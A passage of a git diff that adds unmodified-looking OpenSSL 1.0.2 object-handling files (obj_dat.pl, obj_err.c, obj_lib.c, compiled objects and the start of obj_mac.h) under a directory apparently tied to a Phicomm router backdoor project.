+		if(defined $lnames{$d})
+			{
+			print "WARNING: Duplicate long name \"$d\"\n";
+			}
+		else 
+			{ $lnames{$d} = "X"; }
+		$ln{$1}=$d;
+		}
+	elsif ($v =~ /^NID_(.*)$/)
+		{ $nid{$d}=$1; }
+	elsif ($v =~ /^OBJ_(.*)$/)
+		{
+		$obj{$1}=$v;
+		$objd{$v}=$d;
+		}
+	}
+close IN;
+
+%ob=&expand_obj(*objd);
+
+@a=sort { $a <=> $b } keys %nid;
+$n=$a[$#a]+1;
+
+@lvalues=();
+$lvalues=0;
+
+for ($i=0; $i<$n; $i++)
+	{
+	if (!defined($nid{$i}))
+		{
+		push(@out,"{NULL,NULL,NID_undef,0,NULL,0},\n");
+		}
+	else
+		{
+		$sn=defined($sn{$nid{$i}})?"$sn{$nid{$i}}":"NULL";
+		$ln=defined($ln{$nid{$i}})?"$ln{$nid{$i}}":"NULL";
+
+		if ($sn eq "NULL") {
+			$sn=$ln;
+			$sn{$nid{$i}} = $ln;
+		}
+
+		if ($ln eq "NULL") {
+			$ln=$sn;
+			$ln{$nid{$i}} = $sn;
+		}
+			
+		$out ="{";
+		$out.="\"$sn\"";
+		$out.=","."\"$ln\"";
+		$out.=",NID_$nid{$i},";
+		if (defined($obj{$nid{$i}}) && $objd{$obj{$nid{$i}}} =~ /,/)
+			{
+			$v=$objd{$obj{$nid{$i}}};
+			$v =~ s/L//g;
+			$v =~ s/,/ /g;
+			$r=&der_it($v);
+			$z="";
+			$length=0;
+			foreach (unpack("C*",$r))
+				{
+				$z.=sprintf("0x%02X,",$_);
+				$length++;
+				}
+			$obj_der{$obj{$nid{$i}}}=$z;
+			$obj_len{$obj{$nid{$i}}}=$length;
+
+			push(@lvalues,sprintf("%-45s/* [%3d] %s */\n",
+				$z,$lvalues,$obj{$nid{$i}}));
+			$out.="$length,&(lvalues[$lvalues]),0";
+			$lvalues+=$length;
+			}
+		else
+			{
+			$out.="0,NULL,0";
+			}
+		$out.="},\n";
+		push(@out,$out);
+		}
+	}
+
+@a=grep(defined($sn{$nid{$_}}),0 .. $n);
+foreach (sort { $sn{$nid{$a}} cmp $sn{$nid{$b}} } @a)
+	{
+	push(@sn,sprintf("%2d,\t/* \"$sn{$nid{$_}}\" */\n",$_));
+	}
+
+@a=grep(defined($ln{$nid{$_}}),0 .. $n);
+foreach (sort { $ln{$nid{$a}} cmp $ln{$nid{$b}} } @a)
+	{
+	push(@ln,sprintf("%2d,\t/* \"$ln{$nid{$_}}\" */\n",$_));
+	}
+
+@a=grep(defined($obj{$nid{$_}}),0 .. $n);
+foreach (sort obj_cmp @a)
+	{
+	$m=$obj{$nid{$_}};
+	$v=$objd{$m};
+	$v =~ s/L//g;
+	$v =~ s/,/ /g;
+	push(@ob,sprintf("%2d,\t/* %-32s %s */\n",$_,$m,$v));
+	}
+
+print OUT <<'EOF';
+/* crypto/objects/obj_dat.h */
+
+/* THIS FILE IS GENERATED FROM objects.h by obj_dat.pl via the
+ * following command:
+ * perl obj_dat.pl obj_mac.h obj_dat.h
+ */
+
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+EOF
+
+printf OUT "#define NUM_NID %d\n",$n;
+printf OUT "#define NUM_SN %d\n",$#sn+1;
+printf OUT "#define NUM_LN %d\n",$#ln+1;
+printf OUT "#define NUM_OBJ %d\n\n",$#ob+1;
+
+printf OUT "static const unsigned char lvalues[%d]={\n",$lvalues+1;
+print OUT @lvalues;
+print OUT "};\n\n";
+
+printf OUT "static const ASN1_OBJECT nid_objs[NUM_NID]={\n";
+foreach (@out)
+	{
+	if (length($_) > 75)
+		{
+		$out="";
+		foreach (split(/,/))
+			{
+			$t=$out.$_.",";
+			if (length($t) > 70)
+				{
+				print OUT "$out\n";
+				$t="\t$_,";
+				}
+			$out=$t;
+			}
+		chop $out;
+		print OUT "$out";
+		}
+	else
+		{ print OUT $_; }
+	}
+print  OUT "};\n\n";
+
+printf OUT "static const unsigned int sn_objs[NUM_SN]={\n";
+print  OUT @sn;
+print  OUT "};\n\n";
+
+printf OUT "static const unsigned int ln_objs[NUM_LN]={\n";
+print  OUT @ln;
+print  OUT "};\n\n";
+
+printf OUT "static const unsigned int obj_objs[NUM_OBJ]={\n";
+print  OUT @ob;
+print  OUT "};\n\n";
+
+close OUT;
+
+sub der_it
+	{
+	local($v)=@_;
+	local(@a,$i,$ret,@r);
+
+	@a=split(/\s+/,$v);
+	$ret.=pack("C*",$a[0]*40+$a[1]);
+	shift @a;
+	shift @a;
+	foreach (@a)
+		{
+		@r=();
+		$t=0;
+		while ($_ >= 128)
+			{
+			$x=$_%128;
+			$_/=128;
+			push(@r,((($t++)?0x80:0)|$x));
+			}
+		push(@r,((($t++)?0x80:0)|$_));
+		$ret.=pack("C*",reverse(@r));
+		}
+	return($ret);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_err.c
new file mode 100644
index 0000000..238aaa5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_err.c
@@ -0,0 +1,100 @@
+/* crypto/objects/obj_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/objects.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_OBJ,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_OBJ,0,reason)
+
+static ERR_STRING_DATA OBJ_str_functs[] = {
+    {ERR_FUNC(OBJ_F_OBJ_ADD_OBJECT), "OBJ_add_object"},
+    {ERR_FUNC(OBJ_F_OBJ_CREATE), "OBJ_create"},
+    {ERR_FUNC(OBJ_F_OBJ_DUP), "OBJ_dup"},
+    {ERR_FUNC(OBJ_F_OBJ_NAME_NEW_INDEX), "OBJ_NAME_new_index"},
+    {ERR_FUNC(OBJ_F_OBJ_NID2LN), "OBJ_nid2ln"},
+    {ERR_FUNC(OBJ_F_OBJ_NID2OBJ), "OBJ_nid2obj"},
+    {ERR_FUNC(OBJ_F_OBJ_NID2SN), "OBJ_nid2sn"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA OBJ_str_reasons[] = {
+    {ERR_REASON(OBJ_R_MALLOC_FAILURE), "malloc failure"},
+    {ERR_REASON(OBJ_R_UNKNOWN_NID), "unknown nid"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_OBJ_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(OBJ_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, OBJ_str_functs);
+        ERR_load_strings(0, OBJ_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..6d20e374d8c2da6aa3c3ac5410671b36bdd3bbb1
GIT binary patch
literal 1360
zcmbtSOH0E*5T2N7eH47)L8wSPsi;eRA$pLa)PjggLGU6WZDZ@BNlCU)J?LNPPw^)R
z{sDi6N5z{LooROCcC83HFqxTe=bJ}%?{fRQJ%#~N4A_FNNTL8oJzsvd?PehbL+~~{
z_5KL?ot;f<_PE&ac*ELYD=f3PwBBfkOSj7zmRX&PU`QZ$1hp46e{c*~_JJ@Hm1I0J
zVB8eIXpR`^RI<N?0}(zc&WQV)&<+WB{pglwcHNL>P?l7PW;~q&qHDId=)@>8q3=7`
z#*;tb^ana+2*WXD&Uk0PcwxIiz)FxS6znVCDcgtJdv?f!bFUJDCCbny9ow+*y2hO%
zFwBf>ReIcQa$seLJHU!z2(0ASYOaTv=X00gH7$nRDP4-V;x$-3@at~CuYm>bmBZYs
zeHJ)1S2X{JNh6o;PXB{hQ8WGzBBoqbrZFH)z9)H>la6L}{tTY?qyCk@fLyAXK~+We
zpI1TjWq)bc6iiL6tAXN6o`k3my|RwG$5`?$^i`o<RXN3gYU=!!NYeMx`6rl1uQ@C7
zrFjyAP6%KCEzK$U67SZVC=c{Od5H`RqNN%-pD_LIh;lFbTNEfF;20T2uN(haBv#_g
H$kF+qs60=f

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_lib.c
new file mode 100644
index 0000000..8851baf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_lib.c
@@ -0,0 +1,135 @@
+/* crypto/objects/obj_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+
+ASN1_OBJECT *OBJ_dup(const ASN1_OBJECT *o)
+{
+    ASN1_OBJECT *r;
+    int i;
+    char *ln = NULL, *sn = NULL;
+    unsigned char *data = NULL;
+
+    if (o == NULL)
+        return (NULL);
+    if (!(o->flags & ASN1_OBJECT_FLAG_DYNAMIC))
+        return ((ASN1_OBJECT *)o); /* XXX: ugh! Why? What kind of duplication
+                                    * is this??? */
+
+    r = ASN1_OBJECT_new();
+    if (r == NULL) {
+        OBJerr(OBJ_F_OBJ_DUP, ERR_R_ASN1_LIB);
+        return (NULL);
+    }
+    data = OPENSSL_malloc(o->length);
+    if (data == NULL)
+        goto err;
+    if (o->data != NULL)
+        memcpy(data, o->data, o->length);
+    /* once data attached to object it remains const */
+    r->data = data;
+    r->length = o->length;
+    r->nid = o->nid;
+    r->ln = r->sn = NULL;
+    if (o->ln != NULL) {
+        i = strlen(o->ln) + 1;
+        ln = OPENSSL_malloc(i);
+        if (ln == NULL)
+            goto err;
+        memcpy(ln, o->ln, i);
+        r->ln = ln;
+    }
+
+    if (o->sn != NULL) {
+        i = strlen(o->sn) + 1;
+        sn = OPENSSL_malloc(i);
+        if (sn == NULL)
+            goto err;
+        memcpy(sn, o->sn, i);
+        r->sn = sn;
+    }
+    r->flags = o->flags | (ASN1_OBJECT_FLAG_DYNAMIC |
+                           ASN1_OBJECT_FLAG_DYNAMIC_STRINGS |
+                           ASN1_OBJECT_FLAG_DYNAMIC_DATA);
+    return (r);
+ err:
+    OBJerr(OBJ_F_OBJ_DUP, ERR_R_MALLOC_FAILURE);
+    if (ln != NULL)
+        OPENSSL_free(ln);
+    if (sn != NULL)
+        OPENSSL_free(sn);
+    if (data != NULL)
+        OPENSSL_free(data);
+    if (r != NULL)
+        OPENSSL_free(r);
+    return (NULL);
+}
+
+int OBJ_cmp(const ASN1_OBJECT *a, const ASN1_OBJECT *b)
+{
+    int ret;
+
+    ret = (a->length - b->length);
+    if (ret)
+        return (ret);
+    return (memcmp(a->data, b->data, a->length));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..0cf2a89f375d56c68dd48a0f1ec7138345294e65
GIT binary patch
literal 2632
zcmb`I-ESL35WvTA(wfqoP2~qmh3ceQC{TLxl_0{0Dxd9h&gjz6#DNytoNV`kq5k50
z2Q47_kfhSd6!8}zBzWcz$OE-hXjA$C5`O@d;DHJv1eIC|RSGlbUFEv5Ul1d$cjmV<
zv$G$!zNDMQu}B2CMBq5=SeycE?%C0^ftm#gCgE=U&_CL1+LBf-`45&BjrHyLS``!A
zo0TK+wNt45M&5@1ow45c4(V!Ny}2=o<Qp4*uEy{uaJcg{x@x_T(#efQ^1t#N{tkvp
z{&kFvuYHf8)N|7*WBs1HuT(SBNyEQ!_baVeNGDC-OZj?|^n`Ikr@S!NYoueoPBxh^
zx4z}RWcq)qePi|J_J)P%@2}ZR{;m5z`9BAxl!98_WtuBy)NTcn7``4W^<GZn0^Ml}
zSNj|F5ecwb_i(8<oel-#+6rm8<o~g{IqB>2@0zY|4K_o=EW&0`p)o8pC}$2=i^l!H
zFc{R;U*9zS+h?^i+F5P+8l8esdp+s@c%+#0CXL>EDWi8Obq7<!wRZI#tMPVKsR7L9
z^DoL%OI5Gsdh!d(vr6Wu`n(sI>c_`2N@n`00fupmOkkV9HhW?T#sK=nqS#21gAO7e
zEI{N!B64v5-q>e&gfqw=XJePqhN6`CbSx*Ou0(T^{K<Ghnz}rpNtx9>(MCj?Do8Sp
z<)lPTiUsqXVzE!KepE-P$KkK-VdK%EH<)VY)ju2+4OaUwBP$xLei+}o8wUQd5&V%|
z{Lz5W?(UW-gg!PlOlNT*w60)pk)^QFm?#Q@Vf^?AZjRt@jNmKCsUBVjKd;sZf7rQ&
zikZ*AeC`$NoYw(s)|}62rZrzIF6w2gtmRDI0&VexYN3msFIz49eb5&ctd8eew&S!N
z$S<6JwLEV%D~(3G#;p~{wu7v-W(S&flRA{c^n*fom!6#m+XE>OL?JF=<DAw@g7+Qh
z)HtWdf`t6z*f{@|Ad2Y!!vOE{pP-A2BKjv77xSMC@o=5XAx`Ja>p4GycSrEgL;OG}
zkBmAA)k%%Z8K!W~&mWZT#im=SV(&VGzRoqrZd4T4zTkp#uHsfesdl@dIBhb>T~$<2
zYVBszZlO!7?b-@HIY+y0rFNd#Z?!z7<Fq@r<6gv2N@&-u6{pgqzmfkzWXwTZA%1yT
zWF%j*eHvH;U#?Ss5F4Fc7F$?u6GWL|@$}u3%3lileo3ChMqGTMei7y+UlI{NgN$<i
z*LaoXJcfN(`273A5OqF3@3V|$1ivlja75rdj`t-NFStP}eEC9yJdUH&sL-n{y7PFM
zJF=edKgaK)LOI3w83yXyk@aGH1NpG?Pq7Qd_l3@%-W49t&wtq5G}RYu{!O;v{m3YX
i7*9FHvquDVcK<vwLL%<pV>mV}-eC2A7>XrTjQ<xcfq_#1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_mac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_mac.h
new file mode 100644
index 0000000..f0690b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_mac.h
@@ -0,0 +1,4195 @@
+/* crypto/objects/obj_mac.h */
+
+/* THIS FILE IS GENERATED FROM objects.txt by objects.pl via the
+ * following command:
+ * perl objects.pl objects.txt obj_mac.num obj_mac.h
+ */
+
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#define SN_undef			"UNDEF"
+#define LN_undef			"undefined"
+#define NID_undef			0
+#define OBJ_undef			0L
+
+#define SN_itu_t		"ITU-T"
+#define LN_itu_t		"itu-t"
+#define NID_itu_t		645
+#define OBJ_itu_t		0L
+
+#define NID_ccitt		404
+#define OBJ_ccitt		OBJ_itu_t
+
+#define SN_iso		"ISO"
+#define LN_iso		"iso"
+#define NID_iso		181
+#define OBJ_iso		1L
+
+#define SN_joint_iso_itu_t		"JOINT-ISO-ITU-T"
+#define LN_joint_iso_itu_t		"joint-iso-itu-t"
+#define NID_joint_iso_itu_t		646
+#define OBJ_joint_iso_itu_t		2L
+
+#define NID_joint_iso_ccitt		393
+#define OBJ_joint_iso_ccitt		OBJ_joint_iso_itu_t
+
+#define SN_member_body		"member-body"
+#define LN_member_body		"ISO Member Body"
+#define NID_member_body		182
+#define OBJ_member_body		OBJ_iso,2L
+
+#define SN_identified_organization		"identified-organization"
+#define NID_identified_organization		676
+#define OBJ_identified_organization		OBJ_iso,3L
+
+#define SN_hmac_md5		"HMAC-MD5"
+#define LN_hmac_md5		"hmac-md5"
+#define NID_hmac_md5		780
+#define OBJ_hmac_md5		OBJ_identified_organization,6L,1L,5L,5L,8L,1L,1L
+
+#define SN_hmac_sha1		"HMAC-SHA1"
+#define LN_hmac_sha1		"hmac-sha1"
+#define NID_hmac_sha1		781
+#define OBJ_hmac_sha1		OBJ_identified_organization,6L,1L,5L,5L,8L,1L,2L
+
+#define SN_certicom_arc		"certicom-arc"
+#define NID_certicom_arc		677
+#define OBJ_certicom_arc		OBJ_identified_organization,132L
+
+#define SN_international_organizations		"international-organizations"
+#define LN_international_organizations		"International Organizations"
+#define NID_international_organizations		647
+#define OBJ_international_organizations		OBJ_joint_iso_itu_t,23L
+
+#define SN_wap		"wap"
+#define NID_wap		678
+#define OBJ_wap		OBJ_international_organizations,43L
+
+#define SN_wap_wsg		"wap-wsg"
+#define NID_wap_wsg		679
+#define OBJ_wap_wsg		OBJ_wap,1L
+
+#define SN_selected_attribute_types		"selected-attribute-types"
+#define LN_selected_attribute_types		"Selected Attribute Types"
+#define NID_selected_attribute_types		394
+#define OBJ_selected_attribute_types		OBJ_joint_iso_itu_t,5L,1L,5L
+
+#define SN_clearance		"clearance"
+#define NID_clearance		395
+#define OBJ_clearance		OBJ_selected_attribute_types,55L
+
+#define SN_ISO_US		"ISO-US"
+#define LN_ISO_US		"ISO US Member Body"
+#define NID_ISO_US		183
+#define OBJ_ISO_US		OBJ_member_body,840L
+
+#define SN_X9_57		"X9-57"
+#define LN_X9_57		"X9.57"
+#define NID_X9_57		184
+#define OBJ_X9_57		OBJ_ISO_US,10040L
+
+#define SN_X9cm		"X9cm"
+#define LN_X9cm		"X9.57 CM ?"
+#define NID_X9cm		185
+#define OBJ_X9cm		OBJ_X9_57,4L
+
+#define SN_dsa		"DSA"
+#define LN_dsa		"dsaEncryption"
+#define NID_dsa		116
+#define OBJ_dsa		OBJ_X9cm,1L
+
+#define SN_dsaWithSHA1		"DSA-SHA1"
+#define LN_dsaWithSHA1		"dsaWithSHA1"
+#define NID_dsaWithSHA1		113
+#define OBJ_dsaWithSHA1		OBJ_X9cm,3L
+
+#define SN_ansi_X9_62		"ansi-X9-62"
+#define LN_ansi_X9_62		"ANSI X9.62"
+#define NID_ansi_X9_62		405
+#define OBJ_ansi_X9_62		OBJ_ISO_US,10045L
+
+#define OBJ_X9_62_id_fieldType		OBJ_ansi_X9_62,1L
+
+#define SN_X9_62_prime_field		"prime-field"
+#define NID_X9_62_prime_field		406
+#define OBJ_X9_62_prime_field		OBJ_X9_62_id_fieldType,1L
+
+#define SN_X9_62_characteristic_two_field		"characteristic-two-field"
+#define NID_X9_62_characteristic_two_field		407
+#define OBJ_X9_62_characteristic_two_field		OBJ_X9_62_id_fieldType,2L
+
+#define SN_X9_62_id_characteristic_two_basis		"id-characteristic-two-basis"
+#define NID_X9_62_id_characteristic_two_basis		680
